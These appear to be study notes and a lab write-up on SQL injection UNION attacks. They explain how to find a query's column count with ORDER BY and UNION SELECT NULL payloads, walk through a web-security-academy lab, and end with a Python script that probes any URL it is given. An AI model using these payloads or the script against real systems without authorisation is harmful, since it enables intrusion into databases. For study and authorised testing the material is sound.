# Determining the number of columns required in an UNION attack
---
When performing an UNION attack, there are `two` effective methods to determine how many columns are being returned from the original query:

### 1. ORDER BY
The first method involves injecting a series of `ORDER BY` clauses and incrementing the specified column index _until an error occurs_.
For example:
```python
' ORDER BY 1-- 
' ORDER BY 2-- 
' ORDER BY 3-- 
etc.
```

- The series of payloads modifies the original query to order the results by different columns in the result set.
- The column in an `ORDER BY` clause can be specified by its index, so you don't need to know the names of any columns.
- When the specified column index exceeds the number of actual columns in the result set, the database returns an error, such as:
```sql
The ORDER BY position number 3 is out of range of the number of items in the select list.
```

### 2. UNION SELECT
The second method involves submitting a series of `UNION SELECT` payloads specifying a different number of `null` values:
```python
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL-- 
etc.
```

If the number of `nulls` does not match the number of columns, the database returns an error, such as:
```sql
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.
```
- The application might actually return this error message, or might just return a generic error or no results.
- Worst case, the response might be _indistinguishable_ from that which is caused by an incorrect number of `null`, making this method of determining the column count ineffective.

## Oracle
---
> [!hint]
> On **Oracle** databases, every `SELECT` statement must specify a table to select `FROM`. 
> If your `UNION SELECT` attack does not query from a table, you will still need to include the `FROM` keyword followed by a valid table name.
> 
> There is a built-in on **Oracle** called `dual` which you can use for this purpose.
> For example: `UNION SELECT 'abc',NULL FROM dual`

# Lab: SQL injection UNION attack, determining the number of columns returned by the query
---
1. go to the url `https://0a2200750312d97b802a6d4100a20043.web-security-academy.net/filter?category=Gifts`
2. find the extra NULL columns.
3. using `' ORDER BY 4--` and it's throw an error.
4. that's means `columns 3` what are we looking for. (_ORDER BY only throws an error when something false_) (_4-1=3_)

1. for the `UNION SELECT` its kind of vice versa from the above.
2. using the payload `' UNION SELECT NULL,NULL--`, so on. It's not going throws an error
3. the payload `' UNION SELECT NULL,NULL,NULL--` is we're looking for `column 3`.
4. _UNION SELECT will not throws an error if the conditions is true_

```python
#!/usr/bin/env python3
import requests
import sys

def exploit(url, payload):
    for i in range(1,int(payload)):
        sqli = f"'+ORDER+BY+{i}--"
        req = requests.get(url + sqli)
        if "Internal Server Error" in req.text:
            return i-1
        i = i+1
    return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        payload = sys.argv[2].strip()
    except IndexError:
        print("[*] Usage: {} <url> <payload>".format(sys.argv[0]))
        print('[*] Example: {} http://example.com 10'.format(sys.argv[0]))
        sys.exit(1)

    print("[*] Figuring out number of columns...")
    num_col = exploit(url, payload)
    if num_col:
        print("[*] The number of columns is {}".format(num_col))
    else:
        print("[*] SQLi UNION not successful")
```